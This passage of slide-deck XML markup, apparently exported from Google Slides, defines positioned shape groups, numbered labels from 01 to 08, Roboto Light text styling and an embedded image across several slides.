          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218892" y="7248540"/>
            <a:ext cx="1901385" cy="1190462"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="358" name="Google Shape;358;p5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04</a:t>
              </a:r>
              <a:endParaRPr sz="6900" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="359" name="Google Shape;359;p5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0" name="Google Shape;360;p52"/>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61" name="Google Shape;361;p52"/>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 name="Google Shape;362;p52"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218958" y="8642207"/>
            <a:ext cx="1901385" cy="1190462"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="363" name="Google Shape;363;p5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05</a:t>
              </a:r>
              <a:endParaRPr sz="6900" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="364" name="Google Shape;364;p5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5" name="Google Shape;365;p52"/>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66" name="Google Shape;366;p52"/>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7" name="Google Shape;367;p52"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218958" y="10035874"/>
            <a:ext cx="1901385" cy="1190462"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="368" name="Google Shape;368;p5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06</a:t>
              </a:r>
              <a:endParaRPr sz="6900" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="369" name="Google Shape;369;p5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0" name="Google Shape;370;p52"/>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71" name="Google Shape;371;p52"/>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2" name="Google Shape;372;p52"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218958" y="11497607"/>
            <a:ext cx="1901385" cy="1190462"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="373" name="Google Shape;373;p5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07</a:t>
              </a:r>
              <a:endParaRPr sz="6900" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="374" name="Google Shape;374;p5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5" name="Google Shape;375;p52"/>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76"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="377" name="Google Shape;377;p5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78" name="Google Shape;378;p5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379" name="Google Shape;379;p53"/>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380" name="Google Shape;380;p5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381" name="Google Shape;381;p53"/>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382" name="Google Shape;382;p5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83" name="Google Shape;383;p53"/>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4" name="Google Shape;384;p53"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1219475" y="10328151"/>
            <a:ext cx="1606396" cy="1005814"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="385" name="Google Shape;385;p5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07</a:t>
              </a:r>
              <a:endParaRPr sz="5300" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="386" name="Google Shape;386;p5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7" name="Google Shape;387;p53"/>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88" name="Google Shape;388;p53"/>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9" name="Google Shape;389;p53"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1219175" y="11496427"/>
            <a:ext cx="1606396" cy="1005814"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="390" name="Google Shape;390;p5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08</a:t>
              </a:r>
              <a:endParaRPr sz="5300" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="391" name="Google Shape;391;p5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2" name="Google Shape;392;p53"/>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93" name="Google Shape;393;p53"/>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4" name="Google Shape;394;p53"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1219342" y="7991151"/>
            <a:ext cx="1606396" cy="1005814"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="395" name="Google Shape;395;p5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05</a:t>
              </a:r>
              <a:endParaRPr sz="5300" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="396" name="Google Shape;396;p5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7" name="Google Shape;397;p53"/>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398" name="Google Shape;398;p53"/>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9" name="Google Shape;399;p53"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1219042" y="9159427"/>
            <a:ext cx="1606396" cy="1005814"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="400" name="Google Shape;400;p5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06</a:t>
              </a:r>
              <a:endParaRPr sz="5300" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="401" name="Google Shape;401;p5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2" name="Google Shape;402;p53"/>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03" name="Google Shape;403;p53"/>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4" name="Google Shape;404;p53"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1219408" y="5694151"/>
            <a:ext cx="1606396" cy="1005814"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="405" name="Google Shape;405;p5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03</a:t>
              </a:r>
              <a:endParaRPr sz="5300" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="406" name="Google Shape;406;p5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7" name="Google Shape;407;p53"/>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08" name="Google Shape;408;p53"/>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9" name="Google Shape;409;p53"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1219108" y="6862427"/>
            <a:ext cx="1606396" cy="1005814"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="410" name="Google Shape;410;p5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04</a:t>
              </a:r>
              <a:endParaRPr sz="5300" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="411" name="Google Shape;411;p5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2" name="Google Shape;412;p53"/>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13" name="Google Shape;413;p53"/>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4" name="Google Shape;414;p53"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1219275" y="3357151"/>
            <a:ext cx="1606396" cy="1005814"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="415" name="Google Shape;415;p5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01</a:t>
              </a:r>
              <a:endParaRPr sz="5300" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="416" name="Google Shape;416;p5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7" name="Google Shape;417;p53"/>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18" name="Google Shape;418;p53"/>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9" name="Google Shape;419;p53"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218975" y="4525427"/>
            <a:ext cx="1606396" cy="1005814"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="420" name="Google Shape;420;p53"/>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02</a:t>
              </a:r>
              <a:endParaRPr sz="5300" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="421" name="Google Shape;421;p53"/>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2" name="Google Shape;422;p53"/>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23"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="424" name="Google Shape;424;p5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25" name="Google Shape;425;p5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426" name="Google Shape;426;p54"/>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427" name="Google Shape;427;p5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428" name="Google Shape;428;p54"/>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429" name="Google Shape;429;p5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30" name="Google Shape;430;p54"/>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1" name="Google Shape;431;p54"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1219475" y="10328151"/>
            <a:ext cx="1606396" cy="1005814"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="432" name="Google Shape;432;p54"/>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07</a:t>
              </a:r>
              <a:endParaRPr sz="5300" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="433" name="Google Shape;433;p54"/>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4" name="Google Shape;434;p54"/>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35" name="Google Shape;435;p54"/>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6" name="Google Shape;436;p54"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1219175" y="11496427"/>
            <a:ext cx="1606396" cy="1005814"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="437" name="Google Shape;437;p5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08</a:t>
              </a:r>
              <a:endParaRPr sz="5300" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="438" name="Google Shape;438;p5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9" name="Google Shape;439;p54"/>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40" name="Google Shape;440;p54"/>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1" name="Google Shape;441;p54"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1219342" y="7991151"/>
            <a:ext cx="1606396" cy="1005814"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="442" name="Google Shape;442;p54"/>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05</a:t>
              </a:r>
              <a:endParaRPr sz="5300" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="443" name="Google Shape;443;p54"/>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4" name="Google Shape;444;p54"/>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45" name="Google Shape;445;p54"/>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6" name="Google Shape;446;p54"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1219042" y="9159427"/>
            <a:ext cx="1606396" cy="1005814"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="447" name="Google Shape;447;p54"/>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06</a:t>
              </a:r>
              <a:endParaRPr sz="5300" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="448" name="Google Shape;448;p54"/>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9" name="Google Shape;449;p54"/>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50" name="Google Shape;450;p54"/>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1" name="Google Shape;451;p54"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1219408" y="5694151"/>
            <a:ext cx="1606396" cy="1005814"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="452" name="Google Shape;452;p54"/>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03</a:t>
              </a:r>
              <a:endParaRPr sz="5300" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="453" name="Google Shape;453;p54"/>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4" name="Google Shape;454;p54"/>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55" name="Google Shape;455;p54"/>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6" name="Google Shape;456;p54"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1219108" y="6862427"/>
            <a:ext cx="1606396" cy="1005814"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="457" name="Google Shape;457;p54"/>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04</a:t>
              </a:r>
              <a:endParaRPr sz="5300" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="458" name="Google Shape;458;p54"/>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9" name="Google Shape;459;p54"/>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60" name="Google Shape;460;p54"/>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1" name="Google Shape;461;p54"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1219275" y="3357151"/>
            <a:ext cx="1606396" cy="1005814"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="462" name="Google Shape;462;p54"/>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01</a:t>
              </a:r>
              <a:endParaRPr sz="5300" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="463" name="Google Shape;463;p54"/>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4" name="Google Shape;464;p54"/>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65" name="Google Shape;465;p54"/>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6" name="Google Shape;466;p54"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218975" y="4525427"/>
            <a:ext cx="1606396" cy="1005814"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="467" name="Google Shape;467;p54"/>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02</a:t>
              </a:r>
              <a:endParaRPr sz="5300" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="468" name="Google Shape;468;p54"/>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9" name="Google Shape;469;p54"/>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0"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="471" name="Google Shape;471;p55"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="11427057" y="3154800"/>
            <a:ext cx="2206013" cy="9764321"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="472" name="Google Shape;472;p55"/>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5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74" name="Google Shape;474;p5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475" name="Google Shape;475;p55"/>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476" name="Google Shape;476;p5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477" name="Google Shape;477;p55"/>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478" name="Google Shape;478;p5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79" name="Google Shape;479;p55"/>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endParaRPr sz="5600" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="480" name="Google Shape;480;p55"/>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55"/>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82" name="Google Shape;482;p55"/>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83" name="Google Shape;483;p55"/>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4" name="Google Shape;484;p55"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="13160055" y="3796141"/>
            <a:ext cx="1421954" cy="1422613"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="485" name="Google Shape;485;p55"/>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600"/>
                <a:buFont typeface="Arial"/>
                <a:buNone/>
              </a:pPr>
              <a:endParaRPr sz="5600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="486" name="Google Shape;486;p55"/>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7" name="Google Shape;487;p55"/>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88" name="Google Shape;488;p55"/>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marR="0" lvl="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="3200"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="3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89" name="Google Shape;489;p55"/>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marR="0" lvl="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="5600"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="5600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>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90" name="Google Shape;490;p55"/>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marR="0" lvl="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="5600"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="5600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>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1"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="492" name="Google Shape;492;p5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93" name="Google Shape;493;p5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494" name="Google Shape;494;p56"/>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495" name="Google Shape;495;p5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496" name="Google Shape;496;p56"/>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497" name="Google Shape;497;p5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98" name="Google Shape;498;p56"/>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01</a:t>
            </a:r>
            <a:endParaRPr sz="12800" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="499" name="Google Shape;499;p56"/>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56"/>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56"/>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56"/>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56"/>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02</a:t>
            </a:r>
            <a:endParaRPr sz="12800" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="504" name="Google Shape;504;p56"/>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03</a:t>
            </a:r>
            <a:endParaRPr sz="12800" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="505" name="Google Shape;505;p56"/>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56"/>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56"/>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56"/>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56"/>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04</a:t>
            </a:r>
            <a:endParaRPr sz="12800" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
